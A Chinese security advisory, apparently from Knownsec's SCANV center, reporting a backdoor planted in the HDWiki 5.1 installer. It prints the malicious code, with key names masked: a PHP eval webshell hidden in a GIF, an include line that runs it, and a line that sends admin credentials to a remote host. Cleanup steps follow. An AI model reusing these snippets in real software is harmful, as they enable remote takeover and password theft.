近日,知道创宇旗下SCANV网站安全中心研究人员发现HDWiki百科建站系统(kaiyuan.hudong.com)“HDWiki5.1正式版”被“骇客”人为植入恶意网站木马(后门)代码。
该代码在站长用户下载安装HDWiki程序后,可以记录并发送管理员密码到“骇客”控制的服务器上,并通过该恶意代码直接控制该站长用户的网站系统,实现“脱库”、“挂马”及“非法SEO”等攻击。
后门文件分析
经过SCANV网站安全中心研究人员分析,“骇客”在HDWiki安装文件包里,对三个文件进行篡改,来实现“远程执行恶意命令,记录管理员帐号密码”的目的。这3个文件为:
/api/uc_client/control/mail.php
/style/default/admin/open.gif
/control/admin_main.php
1、远程执行恶意命令
通过前两个文件的篡改,骇客可获得“远程执行恶意命令“权限,可以直接导致攻击者控制网站系统。其中/style/default/admin/open.gif被植入代码:
<?php@eval($_POST[马赛克])?>
这是“骇客”经常使用到的一句话网站木马代码,恶意代码是放在gif图片内,直接访问无法解析为PHP代码执行,然后“骇客”通过篡改/api/uc_client/control/mail.php文件的第9行代码:
@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");
包含了这个含有后门代码的图片,这就使图片中的代码得以执行。
2、记录管理员帐号密码
“骇客”通过篡改文件3来实现“记录管理员帐号密码”的目的,被植入代码位于/control/admin_main.php文件的第70行,代码如下:
@file_get_contents('http://www.马赛克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
实现把用户提交的username以及password截获等信息并发送到一个被“骇客”控制远程的服务器。
知道创宇在第一时间通知了HDWiki官方,但截至到本文发布为止,官方没有做出任何积极回应及防御措施。
知道创宇安全研究团队强烈建议站长朋友,在官方清理恶意代码之前,暂停下载安装HDWiki百科建站系统。
对于已经安装的站长朋友,
知道创宇已经紧急推出了诊断工具(http://www.scanv.com/tools/)进行网站体检,确保网站安全。详细分析及解决方案见下:
第一步:通过SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/进行确认是否受该后门影响。
第二步:手动清除恶意代码
[1]将/api/uc_client/control/mail.php文件里删除第9行代码:
@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");
复制代码
[2]通过复制文件/style/default/open.gif覆盖/style/default/admin/open.gif
[3]将/control/admin_main.php文件里的删除第70行代码:
@file_get_contents('http://www.马赛克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].
'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
第三步:再次通过SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/体检确认。
第四步:登陆网站后台,修改管理员密码。
[注:请务必修改管理员密码,另外处于安全考虑,我们把“骇客”使用的代码部分用“马赛克”字样替换了,请修改代码的时候注意一下。]
关于SCANV网站安全中心及知道创宇
“SCANV网站安全中心”由知道创宇安全研究团队驱动,专注网站安全一体化解决方案,给站长朋友们提供网站漏洞诊断、漏洞预警、被黑预警,并提供多维度的安全解决方案、专家一对一漏洞修复、一键云端防御等。
“知道创宇”全称为北京知道创宇信息技术有限公司。是国内最早提出网站安全云监测及云防御的高新企业,始终致力于为客户提供基于云技术支撑的下一代Web安全解决方案。知道创宇总部设在北京,在香港、上海、广州、成都设有分公司,客户及合作伙伴来自中国、美国、日本、韩国等。
